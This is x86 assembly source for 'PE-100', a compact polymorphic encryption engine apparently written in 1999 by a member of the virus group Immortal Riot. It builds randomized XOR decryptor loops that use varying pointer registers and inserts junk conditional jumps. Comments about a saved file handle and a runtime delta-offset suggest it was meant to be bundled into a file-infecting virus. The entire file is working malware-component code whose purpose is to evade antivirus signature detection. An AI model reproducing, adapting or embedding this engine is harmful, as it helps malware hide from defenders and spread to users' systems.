;============================================================================ ; ; PE-100 by T-2000 / Immortal Riot. ; ; Written on a cloudy afternoon somewhere in February 1999. ; ; Attempt to write a small but effective polymorphic engine, uses BX/SI/DI/BP ; as a pointer-register and conditional JMPs as junk. Size engine: 125 bytes. ; ; Call with: Returns: ; ; DS:SI = Code to encrypt. CX = Size encrypted code. ; ES:DI = Destination-buffer. ; CX = Length of code to encrypt. All registers except BX ; BP = Delta-offset at runtime. and SP are destroyed. ; ;============================================================================ .MODEL TINY .STACK 1024 .CODE START: PE_100: PUSH BX ; Save filehandle. PUSH CX ; Save amount to copy. CALL Add_Bogus MOV AL, 0B9h ; MOV CX, STOSB XCHG CX, AX ; Size of encrypted code. STOSW CALL Add_Bogus Get_Random: IN AL, 40h ; Get a random value. CMP AL, 4 ; Must be 0 - 4. JA Get_Random CMP AL, 1 ; Avoid SP. JE Get_Random ADD AL, (0B8h + 3) ; MOV Reg16, STOSB XCHG BX, AX ; Save Ptr_Reg16. PUSH DI XCHG BP, AX ; Delta-offset at runtime. STOSW MOV CX, DI ; Save offset decrypt-loop. CALL Add_Bogus MOV AX, 802Eh ; XOR BYTE PTR [Ptr_Reg16], STOSW MOV AL, [BX.(Ptr_Addr - Start) - (0B8h + 3)] STOSB CMP AL, 76h ; Ptr_Reg16 is BP ? JNE Get_Encr_Key XOR AL, AL ; BP needs displacement. STOSB Get_Encr_Key: IN AL, 40h ; Get random encryption-key. STOSB XCHG BP, AX ; Save encryption-key in BP. CALL Add_Bogus XCHG BX, AX ADD AL, (40h + 3) - (0B8h + 3) ; INC Ptr_Reg16. STOSB MOV AX, DI ; Displacement between LOOP SUB AX, CX ; and Decryption_Loop. INC AX ; Convert value since it's NOT AL ; a LOOP backwards. MOV AH, AL MOV AL, 0E2h ; LOOP Decryption_Loop. STOSW CALL Add_Bogus LEA CX, [DI-(Buffer-Start)] ; Size of decryptor. POP BX ; Delta-offset encrypted. ADD [BX], CX ; Patch correct code-offset. Encrypt_Poly: POP CX Encrypt_Byte: LODSB ; Load a byte from source. XOR AX, BP ; Encrypt it. STOSB ; And put it in destination. LOOP Encrypt_Byte ; Do the whole thing. LEA CX, [DI-(Buffer-Start)] ; Get total size of code. POP BX ; 1/2 chance of adding a bogus conditional JMP. Add_Bogus: IN AL, 40h ; Get a random value. OR AL, AL ; Should we add a JMP ? JP Exit_Add_Bogus AND AL, 15 ; 0 - 15. ADD AL, 70h ; Make a random JMP. STOSB XOR AL, AL ; Zero displacement. STOSB Exit_Add_Bogus: RETN PE_100_Marker DB 'PE-100', 0 Ptr_Addr DB 37h, 00h, 76h, 34h, 35h Author_Mark DB 'T2IR', 0 Buffer: END START